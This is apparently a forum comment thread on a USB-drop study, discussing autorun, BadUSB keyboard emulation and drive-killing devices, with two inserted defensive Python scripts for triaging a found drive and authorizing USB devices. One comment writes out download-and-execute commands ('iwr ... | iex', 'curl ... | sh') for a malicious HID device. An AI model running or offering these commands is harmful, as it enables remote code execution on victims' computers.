A Lot of People Carelessly Plug In Random USB Drives Into Their Computers (vice.com)
An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist, makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.
Never know what STDs are there, but YOLO
People are stupid, film at 11.
Just cruising through this digital world at 33 1/3 rpm...
The chance of getting juicy selfies are a lot higher than getting infected.
Kind of like picking up an unknown person in a bar and having sex. Maybe even better odds of not getting infected. The study did not compare this.
don't cut it off www.mgmbill.org
Does Windows still run things automatically from external media? I thought that had been changed in Win 7.
Disable auto run always, never open executables outside of your Vm, what's the problem?
This is what my old PIII box is for, testing suspicious devices and software.
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
What is with this 'story' ?
Does Windows 7 or 8/8.1 or 10 auto-run from removable media?
Does OS X 10.x ?
Does Linux?
1) Given: People will take a random USB stick and plug it into a computer.
2) Conclusion: Only a moron will design an operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.
The minimal convenience of having auto-run for USB drives is far over-ridden by the huge security leak.
Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.
excitingthingstodo.blogspot.com
I'd like to see OS source code that protects against this:
http://arstechnica.com/security/2015/10/usb-killer-flash-drive-can-fry-your-computers-innards-in-seconds/
The problem is that the OS will automatically run a program that can install malware from a USB stick.
Hmm? None of the desktop environments I use on my PCs do anything like that, at least not by default. That would be idiocy! The most they do is automatically mount the USB stick, but they certainly don't run anything from it.
I suppose I can guess that yet again, this is something Microsoft decided would be a good idea, similar to how "email viruses" went from being a joke to something that existed in the real world?
Let's not cast the blame too wide. "The OS" doing that means "one specific OS with notoriously poor security for exactly these reasons". If you elect to use that OS, fine - you can even use it securely, and many people manage to, you just have to be careful.
There is a scene in Mr. Robot where a girl dumps a bunch of infected USB stick in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.
I feel sorry for people that don't drink, because when they get up in the morning, that's as good as they're gonna feel
I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
USB drives?!
How about blindly trusting USB chargers from Alibaba/ebay?!
Or assuming that new USB-C cable from Amazon won't set your house on fire?!!!
the preceding comment is my own and in no way reflects the opinion of the Joint Chiefs of Staff
I heard of dropping random USB sticks in public places (10?) years ago for testing security (IIRC in the context of testing banks). That along with strategically dropping CD's in the bathrooms of companies with the CD's marked something like "Super secret HR layoff plan"
I am Slashdot. Are you Slashdot as well?
people picking up random hookers and plugging into them.
by TheSpoom (715771) Uncaring Linux user here. I have nothing to add to this but please continue. *munches popcorn*
This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that don't require an obviously too trusting OS, such as the most popular one that continues in this manner well after the idea has been well and truly discredited.
In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do what you tell it to", and so on, and so forth. It's the industry that's at fault because all that "stupid stuff" the users do, we keep on telling them that it's quite right and go ahead... right up until we chastise them for having fallen for a scam or a virus or whatever. "Sure you can do that", 'but now the box is bleeping angrily', "don't do that then." Worst pavlov training ever.
So no, you really cannot blame "people" for this, nor "users". It's the engineers and perhaps moreso the companies employing the engineers.
You quickly drive through the employee parking/entry area of a bank. You toss half a dozen, maybe less, infected USB drives out your window on the way. I've only ever heard of that testing method used on banks, by genuine, hired security firms, but I imagine it could go a lot further. Needless to say it generally results in "Yay! free USB drives! Let's plug em in!" Then something phones home.
People are simple like that. Every so often someone asks me what the best way to crack (misc.) password is. I tell them to ask for it.
Brought to you by Carl's Junior.
Well, who can resist, I know I can't.
It's a lot safer to try this if you're running Linux or BSD, since at least a Windows .exe can't run. Still, suppose some sort of cross-platform malware is on there?
Might be good to boot off a burner machine with a livecd and nothing important on the HDD before trying this...
"a USB stick given away at a trade show is automatically good." the hell ever gave you that idea? a USB stick in original packaging could have malware all up ins for all you know.
Some years ago at a company I worked at, our hardware vendor came on site and wanted to inspect/service some machines in our racks. I walked him into our data center while he was about to stick a USB key into one of our master database servers. I was like "whoa whoa don't stick anything in there" and he was adamant about doing it, saying he needed to run some diagnostics or some such. So I refuse, and walk him out of the data center. Then my boss (the DBA) ended up escorting him in and watching over him. Stuck the USB key in, database crashed, RAID array failed. Still not exactly sure what happened to cause that, except that it created a lot of work for me.
That's why we have USB authorization. Since 2007.
What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?
Oh right, Windows. Well, there's your problem.
-Forrest Cameranesi, Geek of all Trades
"I am Sam. Sam I am. I do not like trolls, flames, or spam."
Blame the OS? Nope. I'll blame the Operator, not the Operating System.
Consistency is only a virtue if you're not a screw-up.
The intro says: "The problem isn't that people are idiots..."
Let's stop right there. I know for a fact that this premise is wrong.
As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.
Probably, and college students probably don't have corporate security training. It's much more interesting when the thumb drives are dropped outside a supposedly secure business.
There's no way to secure college networks at endpoints owned by students. The security needs to happen elsewhere.
Just look at how people will engage in sex with another human not knowing when or with whom that human has last had sex with. 72% of the population doesn't deserve to live due to their carelessness.
The sun rose in the East today and set in the West. More at 11.
If it ain't broke, don't fix it.
...They say that Stuxnet got deployed like this. Awesome hack, Stuxnet....
Staff secretly dropped computer discs and USB thumb drives in the parking lots of government buildings and private contractors. Of those who picked them up, 60 percent plugged the devices into office computers, curious to see what they contained. If the drive or CD case had an official logo, 90 percent were installed....
I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
Just a quick question.
Suppose the device identifies as a USB keyboard, or identifies as a dual use device USB stick/keyboard?
Suppose the keyboard device is generic, doesn't require a driver, and the micro on the USB stick starts to type things on your computer.
Could that install malware on your system?
(Of course, I didn't need to identify keyboard devices specifically. There are a bunch of devices that a USB device can identify as, some of which allow data to be loaded onto your computer.)
Commvault gave away as swag a few years ago (2011 I believe) a device that looked like a common trade show USB key. However, instead of being an actual useful USB key (it wasn't even a storage device), it behaved like a USB keyboard: upon loading, it hit Win+R and typed in a web page (you could see the letters type across the screen). When I first saw those, it wasn't hard to imagine how easily those could be abused for just this scenario. Heck, you could theoretically have it do all kinds of sneaky things in the background as keyboard input. All you needed to do is plug it in, and it will run. Doesn't matter about auto-mounting or AutoRun since it's not a storage device, but a "keyboard". Other OSes could theoretically be susceptible to it as well since most OSes can take keyboard commands.
The people that pick up a USB drive will of course stick it in their computer. There aren't many other reasons why you would pick it up in the first place.
What I'm more curious about is how the researchers determined what happened after picking it up. Did they have software on it that phoned home (hacking) or did they follow the person (stalking) and question them later.
Why on Earth is this story under 'It's Funny. Laugh.'? Or are topics meaningless now?
Did they account for people who opened and looked at the USB key, but their computer did not auto-run whatever was on there that phoned home? What about people who have the auto-run disabled in Windows, or people who run a smarter OS, like perhaps Linux or Mac or BSD? (I'm not actually sure if these OS's are smarter than Windows, but it seems like they might be.)
-- ssoorrrryy,, dduupplleexx sswwiittcchh oonn.. -Quote found on actual fortune cookie.
In 1989, people would plug random floppies into their computers. At least one early computer virus was spread that way. The more things change...
I have mixed feelings every time I see this. Every time I see one of these articles come across, there's a flood of comments about how its not news, and each time I see it I lean closer to the notion that this paradox of "non-news" that in and of itself is caused by a lack of awareness(which can only be remedied by news) might be dragging along by the dead weight of our habit to only share this knowledge with the tech crowd that already knows about it. This knowledge can only do so much unless it makes its way to those people who keep on asking me to reset their password because they forget that caps lock is on.
It has a small chance to have porn content, or at least, nudes! I can take that risk!
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
Yeah right.
Bruce Schneier is partially correct, the OS is at fault, but the bigger problem is that people are idiots. They're hoping that they'll find something juicy on that drive.
I work on a NAVAL base... our security folks get reports and "found" USB drives ALL THE TIME. Like daily... I find one a week in the off-base parking lots just walking in, and yet despite the constant emails about NOT plugging that shit into our networks people do it all the time.
The problem is that the OS will automatically run a program that can install malware from a USB stick.
Mine doesn't. I know of no Linux or BSD machine that automagically runs any kind of +x'ed code on any kind of removable media.
At least not out of the box. Gee, I wonder what OS is designed for "convenience" rather than protecting the user, and their computer.
Does it start with a W?
--
BMO
If you put a floppy in your computer, would it autoplay? No.
Do your external hard drives autoplay when you put them in? Nope!
The issue here is the bullshit autoplay. CDs and DVDs are guilty of that as well. I have no idea why it's a default feature on computers... the default should be to just open the volume like a drive to allow you to peruse the files on the medium and select what you want to open.
IMO this is a HUGE failure on the OS and whoever decided to allow Auto Play to be a thing.
https://motherboard.vice.com/r...
No, the people are NOT stupid.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.
Table-ized A.I.
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to find one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
The problem isn't that people are idiots
Yes, it is. Would you pick up a random needle off the street and stick it into your vein, then wonder how you got AIDS? Would you stick your dick in some random person you found behind a 7-11, then wonder how you got the clap? It's not the computers fault you stuck an unknown, infected USB drive in it. Take some responsibility for your actions already. This is absolutely nobody's fault but your own, so stop doing stupid shit and then playing the victim card.
The problem is that it isn't safe to plug a USB stick into a computer.
Bullshit. It's perfectly safe to insert a USB stick into a computer, as long as there's nothing malicious on it. Knowing whether or not there's anything damaging on it is up to you, and there's always a risk (even fresh out of the package), but to imply that all sticks are dangerous is just FUD. I've never picked one up off the street, or met one in a truck stop bathroom, and I've never had a bad experience with a thumb drive. Just use some common sense, and take the proper precautions.
Should we also mock Bruce for saying:-
"The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good."
I would say the latter is still suspect, what with Bad-USB firmware and other stuff, just because someone you trust gives you something, the trust does not extend to the something.
First person to invent a cheap, provably secure, not-already-patent/intellectual-property-encumbered "USB condom" (really, a very small computer) that sits between my computer and a USB stick which disables boot, Windows-auto-run, device-driver shenanigans, and the like gets the win.
--
One of many possible ways to do this:
* Assume the device is a generic USB memory stick. If it's not, fail.
* If it is, attempt to access the files using generic methods. If it doesn't work, fail.
* If it's not a recognized filesystem (fat-variations, ntfs, ext2-variations, possibly others), fail.
* Present the directory-tree to the user's real computer as a sub-tree, so any files the host sees in the "root" directory as "special" aren't there.
* Present the "device" to the host as read-only.
* Consider simply not presenting well-known files like autorun.exe to the host computer at all.
The hard part will probably be that future USB sticks may not work with today's "USB condoms" as, by definition, the "condoms" would not trust any device-driver-like code that resides on the USB stick. This can be partially mitigated if the USB stick's device-driver-like code is signed and the signer's key is trusted by the "USB condom." But this is not without its own risks.
--
Bonus points if the "USB condom" it also stops hardware trojan horses like the "plug me in and 30 seconds later I'll fry your USB port" devices, even if it has to die in the process.
-------------
Note - I haven't done a Google search - such a thing may already exist. If it's cheap (under $10) and proven to provide protection without doing harm, I'm interested in buying a few.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
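The read-only, "data and only data" half of the "USB condom" design above can be approximated in software on the host until someone builds the hardware. The script below is an added example written for this page, not code from any commenter or vendor: it assumes the stick has been mounted read-only with execution disabled (mount -o ro,noexec,nodev,nosuid /dev/sdX1 /mnt/found on Linux), walks the mount without opening anything in its associated application, and reports the files that can run code when "opened": autorun.inf, PE/ELF/Mach-O binaries, scripts with a shebang, Windows shortcuts, macro-enabled Office files and double extensions. The sample listing embedded at the bottom is constructed for the example, not taken from a real drive.

```python
"""Read-only triage of a found drive: list what could execute, open nothing.

Assumed usage (not part of the original thread):
    mount -o ro,noexec,nodev,nosuid /dev/sdX1 /mnt/found
    python3 triage.py /mnt/found
"""
import os
import sys

# Magic numbers checked against the first 8 bytes of each file.
_MAGIC = [
    (b"MZ", "Windows PE executable"),
    (b"\x7fELF", "ELF executable"),
    (b"#!", "script with shebang"),
    (b"\xfe\xed\xfa\xce", "Mach-O executable"),
    (b"\xfe\xed\xfa\xcf", "Mach-O executable"),
    (b"\xcf\xfa\xed\xfe", "Mach-O executable"),
    (b"\xca\xfe\xba\xbe", "Mach-O universal binary / Java class"),
    (b"L\x00\x00\x00\x01\x14\x02\x00", "Windows shortcut (.lnk)"),
    (b"\xd0\xcf\x11\xe0", "OLE container (legacy Office, may carry VBA macros)"),
]
_MACRO_EXT = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm"}
_EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js",
             ".jse", ".wsf", ".hta", ".lnk", ".jar"}


def classify(name, header):
    """Return the reasons a file deserves suspicion, from name and first bytes."""
    reasons = []
    lower = os.path.basename(name).lower()
    if lower == "autorun.inf":
        reasons.append("autorun.inf (AutoRun hook; ignored by patched Windows, but shows intent)")
    for magic, what in _MAGIC:
        if header.startswith(magic):
            reasons.append(what)
            break
    root, ext = os.path.splitext(lower)
    if ext in _EXEC_EXT:
        reasons.append("executable extension %s" % ext)
        inner = os.path.splitext(root)[1]
        if inner:  # e.g. vacation.jpg.scr
            reasons.append("double extension %s%s" % (inner, ext))
    if ext in _MACRO_EXT:
        reasons.append("macro-enabled Office document")
    return reasons


def triage(mount_point):
    """Walk a read-only mount and return [(relative path, reasons)] for flagged files."""
    if not os.statvfs(mount_point).f_flag & os.ST_RDONLY:
        raise SystemExit("%s is not mounted read-only; remount with -o ro,noexec first" % mount_point)
    findings = []
    for dirpath, dirnames, filenames in os.walk(mount_point):
        # Do not follow symlinks on untrusted media; they can point anywhere.
        dirnames[:] = [d for d in dirnames if not os.path.islink(os.path.join(dirpath, d))]
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if os.path.islink(path):
                continue
            try:
                with open(path, "rb") as f:
                    header = f.read(8)
            except OSError:
                header = b""
            reasons = classify(fn, header)
            if reasons:
                findings.append((os.path.relpath(path, mount_point), reasons))
    return findings


# Constructed sample of a found stick's contents (name, first bytes); not real data.
SAMPLE_LISTING = [
    ("autorun.inf", b"[autorun]\r\nopen=photos.exe"),
    ("photos.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("Resume_final.docm", b"PK\x03\x04\x14\x00\x06\x00"),
    ("vacation.jpg.scr", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("README.txt", b"If found, please email"),
    ("photos/IMG_0001.jpg", b"\xff\xd8\xff\xe0\x00\x10JF"),
]


def triage_listing(listing):
    """Same classification over an in-memory (name, header) listing."""
    return [(name, classify(name, hdr)) for name, hdr in listing if classify(name, hdr)]


if __name__ == "__main__":
    results = triage(sys.argv[1]) if len(sys.argv) > 1 else triage_listing(SAMPLE_LISTING)
    for path, reasons in results:
        print("%-24s %s" % (path, "; ".join(reasons)))
```

The script deliberately stops at file names and magic bytes: a README.txt is the only thing on a lost drive that is safe to read for an owner's contact details, and even a JPEG is better viewed from a disposable VM than from the finder's daily machine. None of this helps against a device that is not a storage device at all, which is the other half of the design above.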
I think this story runs once a year, choir having been preached to, problem continues.
I think you have your statistics backwards. The number of people carrying around juicy selfies on a USB stick is considerably lower than the amount of USB sticks containing malware.
Mobile phone may be different.
That seems incredibly likely to me as well.
College students are poor, and their data is very important to them. A lost drive could be difficult to replace, to say nothing of the potential to find countless hours of work lost forever. Any normal person would want to identify the owner and return the drive.
To the Slashdot cynics: Considering all the factors surrounding the drives, don't you think that someone who was already well-aware of the risks of accessing drives of dubious origin would consider the threat minimal? A risk so low that it's better to act as a humanitarian, on the (very high) chance that it would save some poor student a lot of trouble? Wouldn't they hope their fellow students would act similarly, disregarding the pitifully minimal risk to try to return the drive, should they have been the one who had lost one?
Required reading for internet skeptics
My computer doesn't run shit when I plug in a USB drive.
On the other hand, I don't use Windows. Auto-run is the stupidest thing ever invented.
You must be a Republican since you have no concern for others. Every time I have done this, it was to ID the owner. Remember, these drives used to be expensive. College students can't afford to lose $70 flash drives. Even more importantly, these drives often contained someone's only copy of certain files, like papers or worse student grades. It's very possible to lose the drive before you get around to making backups. A good person would try to return the drive, because they'd certainly want their drive returned if they lost it. You can minimize risk by doing the check on someone else's computer, or using OSX or Linux.
Real malicious people drop devices that look like USB sticks, but in reality contain a bank of capacitors that slowly charge then deliver a high voltage mega death zap to your USB port. Those puny TVS designed for static don't stand a chance and it perma fries the entire machine.
You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.
I wonder how often black/grey/white hats have mailed compromised devices to offices.
If you started mailing compromised 5 port switches or something to random offices, especially branch offices, I would bet that lots of them would end up getting plugged in and used.
My wife found a USB key in the parking lot a few years ago... I thought about it, then plugged it into my Linux box (figured the chance of malware targetting Linux was close to nil for me)... turned out it had a pretty good pr0n vid on it. Just sayin'.
"The problem is that the OS will automatically run a program that can install malware from a USB stick."
Um, if it's a *stupid* OS. Most sane operating systems don't have flagrant security holes like AutoPlay enabled by default.
I just make sure the OS doesn't automatically open a software on the usb drive
I'd insert the thing into my FreeBSD computer and explore the files looking for identity of the owner — so that I can try to return it, if possible.
If not, I'll reformat it and keep it. I suppose it may be possible to attack me, such as by carefully exploiting some unknown vulnerability in msdosfs.ko, but I doubt it. Not only are they unlikely to exist, even if there is something, exploiting a custom-built kernel is much more difficult than simply kidnapping and torturing me for secrets. It may crash, but is unlikely to do what you want.
Maybe, you can get me through libreoffice, which I may try to use to open files identified as office documents, but even that is most unlikely — because the software is custom compiled for the specific -march and with compiler's protection against stack-smashing attacks. Again, you may succeed in crashing it, but not in obtaining anything useful.
The OS is a commercial offering providing what people pay money to have. People paying for Windows are idiots. I wouldn't voluntarily use it even if it were free...
In Soviet Washington the swamp drains you.
I've had some experience in trying to make macros that would replay keyboard/mouse input in order to run certain applications and execute commands, and it's amazing the kinds of things that can throw it off, even when you're working on a known/controlled system. I bet it'd be possible to make one that, to give an example, if you knew exactly what OS you were using, it would launch the CLI and delete the current user's home folder. I wouldn't bet on getting reliable results doing anything much more complicated than that.
Obligatory link to the BadUSB project, including proof-of-concept:
https://srlabs.de/badusb/
LOL @ appeal to vulcan logic.
Real solid reasoning. Vulcan-like, really.
OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"
True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.
A partial solution would be to display a message and give the user 90 seconds to respond.
"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."
If I was a college student and found one of these drives, I would definitely plug it in to see what was on it.
Not on MY computer, but it can't be hard to find an unguarded USB port on a college campus.
Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.
"First they came for the slanderers and i said nothing."
Microsoft has smart people, and they say that Autoplay is a FEATURE. Anyone who says otherwise is dumb. Where's your multibillion dollar company to prove you know what you're talking about? Macros that move along with Microsoft Office documents? FEATURE, people. FEATURE.
Seriously, though, mainstream OSes should've had this protection ages ago. The BSDs can be compiled to only recognize certain devices on USB, and, if desired, only the first of each kind (so the keyboard that was recognized at boot can't be "replaced" with a device that appears to be the exact same keyboard).
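The "USB authorization since 2007" remark earlier in the thread, the prompt-before-accepting-a-keyboard idea, and the "only the first of each kind" rule above can be combined on Linux without recompiling anything: the kernel can be told to leave new devices unconfigured (echo 0 > /sys/bus/usb/devices/usbN/authorized_default) and a userspace policy then writes 1 or 0 to each device's authorized attribute. The script below is an added example written for this page, not code from the thread or from any distribution. It parses the raw descriptor blob that sysfs exposes as <device>/descriptors, accepts plain storage, refuses a "stick" that also presents a HID interface, and refuses a second HID device once one is authorized. The descriptor blobs at the bottom are constructed for offline testing, not captured from real hardware; the udev hookup that would call authorize() on ACTION=="add" is assumed, not shown.

```python
"""Default-deny USB authorization policy on Linux (added example).

Assumed setup (not from the original thread):
    echo 0 > /sys/bus/usb/devices/usb1/authorized_default   # per root hub
    # udev rule calls: python3 usb_policy.py %k  on SUBSYSTEM=="usb", ACTION=="add"
"""
import os
import sys

SYSFS_USB = "/sys/bus/usb/devices"

# USB-IF interface class codes and the descriptor type we care about.
CLASS_HID = 0x03
CLASS_MASS_STORAGE = 0x08
CLASS_HUB = 0x09
DESC_INTERFACE = 0x04


def interface_classes(descriptors):
    """bInterfaceClass of every interface descriptor in a raw descriptor blob.

    Layout of sysfs <device>/descriptors: device descriptor, then each
    configuration descriptor followed by its interface/endpoint descriptors.
    Every descriptor starts with (bLength, bDescriptorType)."""
    classes, i = [], 0
    while i + 2 <= len(descriptors):
        length, dtype = descriptors[i], descriptors[i + 1]
        if length < 2:
            break  # malformed blob; stop rather than loop forever
        if dtype == DESC_INTERFACE and length >= 9:
            classes.append(descriptors[i + 5])  # bInterfaceClass
        i += length
    return classes


def decide(classes, keyboard_present):
    """Policy verdict (allow, reason) for a device with these interface classes."""
    classes = set(classes)
    if not classes:
        return False, "no interfaces"
    if CLASS_HID in classes and CLASS_MASS_STORAGE in classes:
        return False, "storage device that also claims to be a keyboard/mouse"
    if CLASS_HID in classes:
        if keyboard_present:
            return False, "second HID device while one is already authorized"
        return True, "first HID device accepted"
    if classes <= {CLASS_MASS_STORAGE, CLASS_HUB}:
        return True, "plain storage/hub"
    return False, "unexpected interface classes %s" % sorted(classes)


def _read(path, mode="r"):
    with open(path, mode) as f:
        return f.read()


def authorized_hid_present():
    """True if any already-authorized device exposes a HID interface."""
    for name in os.listdir(SYSFS_USB):
        dev = os.path.join(SYSFS_USB, name)
        auth, desc = os.path.join(dev, "authorized"), os.path.join(dev, "descriptors")
        if os.path.isfile(auth) and os.path.isfile(desc) and _read(auth).strip() == "1":
            if CLASS_HID in interface_classes(_read(desc, "rb")):
                return True
    return False


def authorize(name):
    """Apply the policy to one device (kernel name such as "1-3") and write the verdict. Needs root."""
    dev = os.path.join(SYSFS_USB, name)
    classes = interface_classes(_read(os.path.join(dev, "descriptors"), "rb"))
    allow, reason = decide(classes, authorized_hid_present())
    with open(os.path.join(dev, "authorized"), "w") as f:
        f.write("1" if allow else "0")
    print("%s: %s (%s)" % (name, "ALLOW" if allow else "DENY", reason))
    return allow


# Constructed descriptor blobs for offline testing (not captured from real hardware).
def _desc(dtype, payload):
    return bytes([len(payload) + 2, dtype]) + payload


def _interface(num, cls, sub, proto):
    return _desc(DESC_INTERFACE, bytes([num, 0, 1, cls, sub, proto, 0]))


def _config(interfaces):
    body = b"".join(interfaces)
    total = 9 + len(body)
    return _desc(0x02, bytes([total & 0xFF, total >> 8, len(interfaces), 1, 0, 0x80, 50])) + body


_DEVICE = _desc(0x01, bytes(16))  # 18-byte device descriptor with zeroed fields
SAMPLE_STICK = _DEVICE + _config([_interface(0, CLASS_MASS_STORAGE, 0x06, 0x50)])
SAMPLE_BADUSB = _DEVICE + _config([_interface(0, CLASS_MASS_STORAGE, 0x06, 0x50),
                                   _interface(1, CLASS_HID, 0x01, 0x01)])

if __name__ == "__main__":
    if len(sys.argv) > 1:
        authorize(sys.argv[1])
    else:
        for label, blob in (("plain stick", SAMPLE_STICK), ("stick+keyboard", SAMPLE_BADUSB)):
            print(label, decide(interface_classes(blob), keyboard_present=True))
```

Two caveats a practitioner should keep in mind. The "first HID device" rule only helps on a machine whose real keyboard is already authorized; a laptop's built-in keyboard is usually not a USB device, so the first USB "keyboard" of the day will be accepted. And a device that presents nothing but a HID interface is indistinguishable from a keyboard at this layer, which is exactly the BadUSB point made further up; the policy narrows the attack surface, it does not close it.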
Just drop some USB devices with certain key wires crossed... bad things are bound to happen.
You don't even need to pick up a random device for this, I've had it happen with store-bought stuff
Every system I build has at least one PS2 Port (Keyboard/Mouse) and I never use a USB keyboard simply because I have so many 101-102 keyboards with number pads. Don't buy any of those stinking crap Quiet keyboards because they don't last worth a damn and no I don't always need a Model M style - have several Compaq keyboards that are membrane that are solidly built with proper key travel.
Personally, I spend a bit more than $2 for decent keyboards and consider it money well spent since employees have fewer problems with them. The big issue I have is being asked where to buy them, and twice a year now I offer my employees the ability to get the same keyboards as the office has at my cost, and they tend to take me up on it. Never too many, but I always have a few takers.
Jesus. I probably would have just left it on the ground.
You did see the malicious USB "drive" that was actually a transformer right (developed as an exhibit on how dangerous random USB can be)? It took about a second for it to build up 240V and send it back through the port. First pulse dropped the screen and probably everything else as well, the second pulse killed the whole laptop power system. And it all happened before you could even pull it. It also would keep pulsing until power to the port stopped.
No, the people are NOT stupid.
Thousands upon thousands of years of history disagree.
Unfortunately, the most popular desktop OS wasn't designed by Vulcans. It was designed by Ferrengi.
>"The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer."
Really? I have used hundreds of Linux machines for dozens of years. Not a single one has automatically run a program or automatically opened a file from a USB drive. Ever.
I have also plugged into many Android devices- never seen anything run automatically on those either.
Consider this: The USB device emulates a keyboard and a storage device. Then you just have to get it to run some bad code stored inside.
Trying to do much through the GUI could be quite error-prone, though errors are acceptable. The more normal approach would be for the keyboard to run something like this single command for Windows, which tells the OS to download and run a script (the Run box only launches programs, so the fetch-and-run has to be wrapped in powershell.exe):
Win+R powershell -c "iwr http://tinyurl.com/hfgrhd | iex"
And / or this for Linux and Mac:
Ctrl-Alt+F1 curl http://tinyurl.com/hfhfh | sh
Ctrl-Alt+F7
PowerShell or /bin/sh takes over from there; the victim could yank the trojan device out and the malicious script will continue to run in the background.
Schneier's statement, "The problem is that the OS will automatically run a program that can install malware from a USB stick," was out of date when he wrote it back in 2011. Only a few days after his post, he corrected it to say "EDITED TO ADD (7/4): As of February of this year, Windows no longer supports AutoRun for USB drives."
The only issue here is about exploits sitting in files on the stick, which is not much more of a risk than those you can receive via email or web. Sure, the USB stick could emulate a keyboard and try to run a malicious script, but that would be a less reliable hack due to variations in OS, permissions, etc.
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
I'm guilty of this. I get annoyed when people don't put a readme.txt in the root. It's the first thing I do with a device. So far I've been able to contact 2 people and return 3 more, with one that had enough files that I knew what class they took but nothing with their name on it. It's interesting that I've never considered the malware; with Windows no longer doing auto-run (to the great annoyance of my PortableApps install), I figured, shrug, what're the chances.
Just another second banana
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to find one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
no man.. you're my hero. This is the level of comfort I want to have with file digging.
Automatic execution is a dumb idea and needs to go away. What is more, the same execution warnings that exist when you directly execute a downloaded file from a browser should exist when you execute a file on an UNKNOWN USB drive. I don't think it would be that hard to flag given USB drives as known and unknown.
And regardless... auto execution remains retarded. Its one of the many things I make sure is disabled on all my systems.
I've decided to stop wasting my time responding to AC trolls/sockpuppets... so if you want a response from me... login.
That's the concept that is proposed as a solution, but it's not trivial to implement. If you've ever tried to boot a machine with no OS on a properly connected drive, or indeed used BIOS, you know that the keyboard functions without needing permission from any operating system.
Specifically, the System Request key (typically Alt-PrntScrn) is used to debug operating systems and CPU hardware. SysRq commands can do things like pause the OS kernel, and dump RAM.
To prevent trojan HID attacks, the motherboard and the OS will need to communicate using some new protocol. The motherboard will have to give the OS an opportunity to block new hardware while the OS prompts the user.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The problem isn't data drives, so much as devices that look like data drives but also do other more "interesting" things when plugged in. ;)
USB was designed to do many things, data drives was just one use case. USB's flexibility is what allows hackers to hack.
I don't care if it's 90,000 hectares. That lake was not my doing.
Good luck typing Win+R with my Dvorak keyboard layout... Or can HID devices generate actual ascii/unicode symbols rather than scan codes?
Avantslash: low-bandwidth mobile slashdot.
No idea if he has, but it can be done for http://www.aliexpress.com/item...
This was meant to say less than $2 and a link to an AliExpress page for an Arduino Nano knock-off.
The love child of a Ferengi and a Pakled might be closer.
Some of what I say is fact, some is conjecture, the rest I'm just blowing out my ass...you guess.
Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection.
A Dedicated Charging Port that conforms to the USB Battery Charging specification doesn't need to "successfully negotiate a USB data connection".
That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.
At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.
Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.
My Chromebook has never had this problem. Neither has my Linux workstation.
